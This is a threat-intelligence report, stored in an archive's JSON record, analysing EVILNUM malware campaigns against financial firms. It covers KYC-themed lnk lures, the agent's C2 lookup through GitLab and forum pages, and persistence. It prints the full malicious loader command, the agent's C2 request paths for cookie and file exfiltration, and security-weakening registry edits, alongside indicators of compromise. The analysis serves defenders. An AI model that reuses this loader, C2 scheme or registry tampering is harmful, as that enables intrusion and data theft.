{
	"id": "b0cbe67d-568c-44ac-9000-0136388ac6c8",
	"created_at": "2026-04-06T01:30:33.185284Z",
	"updated_at": "2026-04-10T03:34:23.576123Z",
	"deleted_at": null,
	"sha1_hash": "97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3",
	"title": "Phantom in the Command Shell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2631614,
	"plain_text": "Phantom in the Command Shell\r\nPublished: 2020-05-06 · Archived: 2026-04-06 00:35:09 UTC\r\nExecutive Summary\r\nPrevailion’s Tailored Intelligence Team has detected two new criminal campaigns targeting the global financial industry with\r\nthe EVILNUM malware, one of which became active on May 3rd 2020. We have dubbed these new operations “Phantom in\r\nthe [Command] Shell”.\r\nIn these engagements, the attack begins when a victim is enticed into following a link to a file hosted on a well known,\r\nwidely-used cloud provider - unaware that email filters are unlikely to block the domain, and the provider will trust their\r\nown links enough that a scan is unlikely. Once engaged, the victim’s device downloads a compressed folder that contains\r\ntrojanized files. This is a user-initiated infection, meant to appear as a typical business interaction, in this case part of “Know\r\nYour Customer” banking procedures. These trojanized files use images of credit cards, driver’s licenses, passports, and\r\nutility bills. When the files are opened, the decoy images are displayed to the user, while an agent written in headless\r\nJavaScript is surreptitiously invoked. Investigation of the agent reveals a code comment indicating the two latest iterations are\r\nversion 3.6 and 4.0, respectively. Both are designed for Windows OS.\r\nThe first version of EVILNUM was identified in 2018; the second version was discovered in an unrelated incident response\r\ninvestigation a year later, having infiltrated a FINTECH company. The initial reporting on this malware was the only sign of\r\nits presence, as it briefly faded from view.\r\nEVILNUM has surfaced again in the financial sector with a new variant that has evolved with a very effective tool designed\r\nto evade both standard network- and host-based detection systems. 
It uses supplementary logic designed to help it adapt to\r\nthe local system and alter its actions - and even the choice of C2 - based upon the antivirus products that are detected on the\r\nhost machine. This agent allows the threat actor to upload files, download files, run commands, steal cookies and access\r\nother protected data. It is designed to persist through reboot by adding a registry key, and even removes artifacts of its\r\npresence from the host machine. Given the versatility added to this variant, we suspect that this agent has the capacity to\r\nload auxiliary payloads onto a host machine.\r\nTechnical Details\r\nIntroduction\r\nPrevailion has discovered an updated variant of the deceptive EVILNUM agent. This agent was delivered to victims from a\r\nURL on a cloud-platform that hosts a zip file. If the link is clicked, the victim downloads a compressed folder riddled with\r\ntrojanized files that masquerade as PDFs and JPEGs. These files display themselves as seemingly innocuous decoys to the\r\nend user, all while quietly running in the background. The first version of EVILNUM malware was observed and reported in\r\n2018. The second version was reported by Palo Alto, targeting a specific financial technology (FinTech) organization. This\r\nreport covers the latest versions 3.6 and 4.0, how they’re delivered, evasion techniques, and communications channels.\r\nInfection Vector\r\nThe infection chain begins when the victim receives a link to a Uniform Resource Locator (URL) hosted on a cloud-based\r\nplatform, in this case GoogleDrive. This technique is increasingly used to avoid intrusion detection system (IDS) rules, by\r\nhosting the malicious file on a 3rd party platform that was likely whitelisted. When that link is clicked and traffic to\r\nGoogleDrive is initiated, it begins the process of downloading a compressed folder from that location. 
\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 1 of 9\n\nPhantom in the command shell campaign walk through\r\nMicrosoft Link Lures\r\nPrevailion has thus far identified two compressed files harboring the subject malware, although there is evidence to suggest\r\nthat more zip folders exist. Once decompressed, the folder is found to contain Microsoft shortcut (lnk) files that were named\r\nto impersonate either jpeg or pdf files. We have categorized these lnk files into two subcategories. The first set of lures uses\r\nthe basic Know Your Customer (KYC) elements as a ruse; these elements are files that anyone would be asked for when\r\nopening a new account with a finance services organization. Some examples include but are not limited to driver’s license,\r\ncredit cards, credit history documents, and proof of address paperwork. The second subcluster includes a document that\r\nappears to impersonate an established financial services organization, and referenced their 2020 GDPR compliance plan.\r\nGiven the nature of these lures, Prevailion suspects with moderate confidence these efforts were targeted towards select\r\nfinancial institutions rather than wide-scale spamming.\r\nOnce decompressed, the first zip folder contained the following KYC files:\r\n●      Driv License front.jpg.lnk\r\n●      Driv License back.jpg.lnk\r\n●      Credit Card Front.jpg.lnk\r\n●      Credit Card Back.jpg.lnk\r\n●      Utility Bill.jpg.lnk\r\nThe name on the driver’s license corresponds to a real person, who happens to be the CEO of a bank located in a British\r\nterritory. The address on the utility bill matches the city of the bank. The second compressed folder was very similar to the\r\nfirst, containing various KYC documents and impersonating a Canadian person whom we suspect works for a different\r\nfinancial organization. 
The last KYC client file that we identified was a Finnish national whom we suspect works for a\r\nmanaged cloud services provider. Prevailion was unable to confirm if these documents were authentic; however, if forged,\r\nthey closely resemble the genuine article.\r\nThe second subcategory contains a file name that references an organization rather than an individual. The document\r\nimpersonates an investment company located in England. Like the previously mentioned lnk files, when clicked by the user\r\nit launches a script to run in the background of the computer.\r\nAs we mentioned, there is added functionality built into this particular agent, and one element is in the display of a decoy\r\nfile that corresponds to the selected file name. We analysed the properties of the lnk files themselves with an lnk parser to search\r\nfor clues left behind by the actor. However, all the lnk files had the same forged metadata; the files were timestomped with a\r\ncreation date of September 5th, 2018, from a VMware device, based upon the MAC address, that had a NetBIOS name of\r\n“admin-pc”, suggesting they went to some lengths to obfuscate the metadata related to their activities. The lnk file properties\r\ncan be found below. 
\r\n[Distributed Link Tracker Properties]\r\nVersion:                                      0\r\nNetBIOS name:                          admin-pc\r\nDroid volume identifier:              a82e4430-d4a8-417a-b678-88e886bec590\r\nDroid file identifier:                     8cb9d0c4-b0f4-11e8-b065-005056c00008\r\nBirth droid volume identifier:      a82e4430-d4a8-417a-b678-88e886bec590\r\nBirth droid file identifier:             8cb9d0c4-b0f4-11e8-b065-005056c00008\r\nMAC address:                            00:50:56:c0:00:08\r\nUUID timestamp:                       09/05/2018 (10:15:01.429) [UTC]\r\nUUID sequence number:           12389\r\nLoader Functionality\r\nOpening any one of the files, such as “Credit Card Front,” executes a protracted command line argument. The first operation\r\nmoves the file to the Temp folder and renames it “1.lnk”. Then it proceeds to search for all the files that start with “Cred” in\r\nthe Temp directory, searching recursively through all directories for files modified that day, and moves each match to 1.lnk as well. Next it reads the 1.lnk file, keeps only the lines containing “TRU4”, and redirects that\r\noutput into a new file named 0.js. It then uses cscript to execute that file. The command is as follows:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c path=C:\\Windows\\system32\u0026\u0026move \"Credit Card front.jpg.lnk \"\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\1.lnk\"\u0026forfiles /P \"C:\\Users\\admin\\AppData\\Local\\Temp\" /M \"Cred*.lnk\" /S /D 0\r\n/C \"C:\\Windows\\system32\\cmd.exe /c move @path C:\\Users\\admin\\AppData\\Local\\Temp\\1.lnk\"\u0026type\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\1.lnk\"|find \"TRU4\"\u003e\"C:\\Users\\admin\\AppData\\Local\\Temp\\0.js\"|rd a||cSCripT\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\0.js\"\r\nCore Agent\r\nThis file, 0.js, is the main agent deployed to the victim’s machine. 
It's written in Phantom and this particular script was\r\ndesigned for Windows OS. One comment in the code suggested that this particular iteration was version 3.6. One of our\r\nfavorite elements was the use of a one-way communication method to obtain the C2, in order to remain elusive. This agent\r\nalso has a built-in function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack.\r\nOnce initiated, the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to\r\nobtain the following information:\r\n●      Computer name\r\n●      Username\r\n●      Antivirus products\r\nThis agent had traditional trojan functionality that allowed it to perform the following tasks:\r\n●      Upload files\r\n●      Download files\r\n●      Harvest cookies\r\n●      Get files from the C2\r\n●      Run arbitrary commands\r\n●      Run Windows Script Component (.sct) files\r\n●      Call a Python 2.7 interpreter through rundll32\r\n●      Log any errors that the agent generated\r\nOne difference between this variant and previous iterations is the removal of the screenshot functionality. This agent did\r\nmaintain some original functions such as bringing files down from the C2, converting strings of data into bytes, and\r\nreceiving binary data. This suggests the agent was capable of retrieving subsequent payloads, indicating it was likely just a\r\nfirst stage agent.\r\nRetrieval of C2 Address\r\nOne of the first things the agent does is ping Google to check for an internet connection. 
If the host machine is connected to\r\nthe internet, the agent proceeds to kill any instances of Internet Explorer which have the command line parameter matching\r\n“-Embedding.” It then uses Internet Explorer to retrieve a remote web page that acts as a one-way communication method;\r\nthat web page contains a string that identifies the corresponding C2 node.\r\nLike the previous variants of EVILNUM, the actor set up accounts on GitLab and Digital Point, a web forum. The four\r\nprimary URLs used as drop sites for one-way communications were:\r\n●      hxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md\r\n●      hxxps://www.digitalpoint[.]com/members/johndeer123.923670/\r\n●      hxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md\r\n●      hxxps://www.digitalpoint[.]com/members/bliblobla.943007/\r\nThe actor likely set up two web pages that corresponded to each campaign for redundancy. The function would periodically\r\ncheck those two web pages every 180000 seconds (50 hours).\r\nMetadata properties of the most recent campaign show that the “bliblobla123” GitLab account was created on May 3rd,\r\n2020.\r\nImage showing the date when the GitLab account was created\r\nImage showing the latest C2 embedded in the README.MD file\r\nThe “johndeer123” Digital Point account associated with version 3.6 was created on February 21, 2019. One of the\r\ndifferences in the 3.6 and 4.0 variants is that the agent obtains the IP address through a regex search for the string\r\n“8346758545”. 
On the Digital Point web forum instance the observed C2, hxxp://185.62.190[.]89, was stored as a value in\r\nthe “interest” field.\r\nImage of Johndeer123 Digital Point Profile\r\nIf the host is running BitDefender, EVILNUM will reach out to a different URL,\r\nhxxps://gitlab[.]com/jhondeer123/test/raw/master/test.py. The agent then searches for the same string “8346758545”. There is\r\nalso some fallback functionality to use “long2ip”, the arithmetic-based method implemented in the previous agent. This\r\nmethod takes the number, divides it by 8, and converts the result to an IP address.\r\nCommand and Control Communications\r\nOnce the agent obtains the IP address it will send a GET request to check.php. If the IP address is indeed the correct C2, it\r\nreturns a message padded with “jifhruhajsdfg444” on each side. In this case it received a padded “success” message:\r\nWireshark stream of a check interaction from the victim to the C2\r\nOnce the agent confirms the correct IP address, it proceeds to send a register request. In this POST it sent the host-based\r\nenumeration information. 
Once received, the\r\nC2 responded with the agent’s unique identifier that will then get saved at\r\nappDataPath + \\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\MediaManager\\\\id.txt.\r\nImage of the register function with version 3.6 on the left and 4.0 on the right\r\nBased upon code analysis the following HTTP requests and parameters were identified:\r\n●      \"check.php?id=\"+id + \"\u0026ver=\"+ ver\r\n○      Agent confirms it has the right IP address and sends version number\r\n●      \"register.php?av=\" + av + \"\u0026cpu-name=\" + cpuName + \"\u0026ref=\"+ REFNAME + \"\u0026user=\" + userName\r\n○      Registers the agent with the C2 and obtains a unique identifier\r\n●      \"view.php\", \"id=\" + id\r\n○      Get commands from the C2\r\n●      \"cookies.php?id=\"+id\r\n○      Upload harvested cookies to the C2\r\n●      \"DOWNLOAD_FILE.php\".toLowerCase(), \"FILE-URL=\".toLowerCase() + fileURL\r\n○      Download file from C2 then place in tmp and appData folders\r\n●      \"send.php?id=\"+id, filePath, \"uploaded_file\"\r\n○      Upload file from infected host to C2\r\n●      \"upload.php?id=\"+id, sctFile, \"uploaded_file\"\r\n○      Obtain Windows Script Component from C2, then store it as “878478ddd3.TMP”\r\nPersistence\r\nAs we described, the agent will persist through a reboot by adding a registry key. This is the same technique that was used in\r\nthe 2.0 version. One notable feature is that the actor added logic to modify the registry key location, based on the antivirus\r\nproduct that was detected during the enumeration phase. In the previous version, it would only specify what to do when\r\nBitDefender was installed on the host. The new version added functionality to account for Avast. 
If either of those two\r\nantivirus products was detected, it created a registry key at:\r\nHKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\.\r\nIf there is no antivirus product detected - or something other than BitDefender and Avast - it will create a registry key at:\r\nHKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows.\r\nBoth keys will then run a shortcut file specified at the path:\r\n\"C:\\\\Users\\\\admin\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\MediaManager\\\\Media.lnk\".\r\nThis shortcut file maps to the media.js file, which contains a copy of the core agent. This set of registry persistence\r\nmodifications is stored in a file named media.reg.\r\nThe second registry modification file, mediaIE.reg, is the same file that has been used since version 1 of EVILNUM. These\r\nregistry modifications appear to have remained consistent across the newest versions. The modifications are intended\r\nto weaken the security of the host machine. For example, one modification removes the “no protect mode” banner,\r\npotentially luring victims into a false sense of security. Another example is the removal of a feature of CCleaner that clears\r\ndata downloaded from browsers; this is likely meant to ensure downloaded scripts or tools were not removed. 
The registry\r\nkeys and modified parameters are listed below.\r\n●      HKEY_CURRENT_USER\\\\Control Panel\\\\Cursors\r\n○      \"AppStarting\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,6\r\n○      This decodes to “%.S.y.s.t.e.m.R.o.o.t.%.\\.c.u.r.s.o.r.s.\\.a.e.r.o._.a.r.r.o.w...c.u.r…”\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\r\n○      \"Check_Associations\"=no\r\n○      \"NoProtectedModeBanner\"=dword:00000001\r\n○      \"IE10RunOncePerInstallCompleted\"=dword:00000001\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Recovery\r\n○      \"AutoRecover\"=dword:00000002\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\PhishingFilter\r\n○      \"EnabledV9\"=dword:00000001\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\BrowserEmulation\r\n○      \"MSCompatibilityMode\"=dword:00000001\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\r\n○      \"EnableBalloonTips\"=dword:00000000\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\r\n○      \"GlobalUserOffline\"=dword:00000000\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner\r\n○      \"BrowserMonitoring\"=-\"(Mon)3001\\\"\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\r\n○      \"2500\"=dword:00000003\r\nConclusion\r\nThe Phantom in the Command Shell campaign shows that the threat actors behind the EVILNUM malware family are\r\nconstantly advancing their techniques as they continue to focus their efforts on the global banking/financial system. 
The\r\ndifferences between the 3.6 and 4.0 variants appear to be trivial and do not affect functionality.\r\nThis group has been targeting the financial sector since 2018 and has achieved success due to their ability to use innovative\r\nmethods to stay ahead of defensive measures, such as the use of JavaScript-based agents instead of relying upon more\r\ncommonly used methods such as executable files. They have continued to evolve this agent by modifying the location of\r\ncertain files to avoid detection by specific antivirus products and changing communications patterns when certain products\r\nare being employed. They created an elaborate command and control retrieval tactic by embedding instructions to use well\r\nknown platforms, in order to bypass detection. They also configured the agent to use different C2 nodes depending on the\r\nsecurity products used by the host machine.\r\nOne possible way to protect against this threat is to disable Microsoft shortcut files on high risk machines that routinely\r\ninteract with untrusted parties. These high risk machines should also be segmented within the network to impede attackers'\r\nability to spread laterally if they were compromised. We recommend routinely monitoring network logs to check for\r\nabnormal connections to IP addresses associated with virtual private servers.\r\nPrevailion has shared our findings with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy\r\nprotections to their customers and to systematically disrupt malicious cyber actors. 
For more information on the Cyber\r\nThreat Alliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nGDrive URLs\r\nhxxps://drive[.]google[.]com/uc?auth_user=0\u0026id=1KjJy7FCn-4IN7rsOSwWmSab3xVfY-wNn\u0026export=download\r\nhxxps://docs[.]google[.]com/uc?authuser=0\u0026id=1TROQjDFvR1pw7QckQq1TUVnOYUK6tR6Q\u0026export=download\r\nZip Files\r\n0f4b51dafe6bd75bce2cfbd1fe16d1af91fd958084e23b526671b4e05423f9ee\r\n97aa67531305da6fb73198fabd05b0592705c427519670a218d68d9def83f764\r\n83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c\r\nMicrosoft Shortcut (Lnk) Files\r\n9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5\r\nb89cc69c63894c4b263be5a7b7390d3f8500a8ed4834882a7282ebca301e528e\r\n951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b\r\n7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6\r\n4930874f700dd81bff1c0f2ec7a8f55741987e102be8164bdc4aad6ea97062cb\r\n1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284\r\n88537039a4b87ff55ef9a57c21f728ecf90e40e532486913d763e16db04ccac4\r\n01f1f23649920e30d510f6ae48e370c82dd57ce0817d12f649615d7188c9b0e2\r\nca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30\r\nCeb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea\r\n83e5eeb549543e16f98eb26d848194baa8273d5e0408c72222999535f91434fe\r\n4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade\r\nBb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7\r\n7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e\r\n69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4\r\nE06ab6b87c4977c4ee30f3925dd935764a0ec0da11458aca4308da61b8027d76\r\n79ddc62bcab8efaef586c7e4202fa6a40a82a37571cbab309812602f7a03162b\r\nCore Agent\r\nJavascript agent version 
4.0\r\n75ae7bbdbfccde37a545a6b316e885e9a6d1ecf3c069fa48594a6db6f30c41d0\r\nJavascript agent version 3.6\r\n8c770d3424324030887fd6efcd7b989129f1430b8dafb482372240e93c009a24\r\n951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b\r\nJavascript agent version 3.5\r\nba4ca5ae0aeb7916a6b08320830bb48c756f7ebaa281431e1311cb66dba3bca0\r\n8100351010C260A7BDC2D283065097140418B5A33CF682F902E793FFAED263D4\r\nMedia.reg\r\n9FEE4514F8B3027AD045E67EE8D80317DD2AFBF7A996C97F47C216EAD011B070\r\nMediaIE.reg\r\n6cc5a6ce509a7bbbcaeab1f0635c8b14cbd6a5503cde799de3163fbf70221301\r\nActor-created Folders\r\nappData + \\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\MediaManager\\\\\r\nappData + \\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\UtilitiesLog\\\\\r\nC2 Retrieval URLs\r\nhxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md\r\nhxxps://www.digitalpoint[.]com/members/bliblobla.943007/\r\nhxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md\r\nhxxps://www.digitalpoint[.]com/members/johndeer123.923670/\r\nhxxps://gitlab[.]com/jhondeer123/test/raw/master/test.py\r\nCommand and Control Nodes\r\nhxxp://139.28.37[.]63\r\nhxxp://185.62.190[.]89\r\nhxxp://185.62.190[.]218\r\nMITRE ATT\u0026CK Framework Mapping\r\nTactic: Technique(s)\r\nInitial Access: Spear Phishing Link (T1192)\r\nExecution: User Execution (T1204)\r\nPersistence: Registry Run Keys / Startup Folder (T1060)\r\nDefense Evasion: Timestomping (T1099), Indicator Removal from Host (T1070), Modify Registry (T1112), Hidden Window (T1143), Rundll32 (T1085)\r\nCredential Access: Steal Web Session Cookie (T1539)\r\nCollection: Data from Local System (T1005), Data Staged (T1074)\r\nCommand \u0026 Control: Commonly Used Port (T1043), Web Service (T1102), Remote File Copy (T1105)\r\nExfiltration: Exfiltration Over Command and Control Channel (T1041)\r\nSource: 
https://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html"
	],
	"report_names": [
		"phantom-in-command-shell5.html"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439033,
	"ts_updated_at": 1775792063,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3.pdf",
		"text": "https://archive.orkl.eu/97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3.txt",
		"img": "https://archive.orkl.eu/97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3.jpg"
	}
}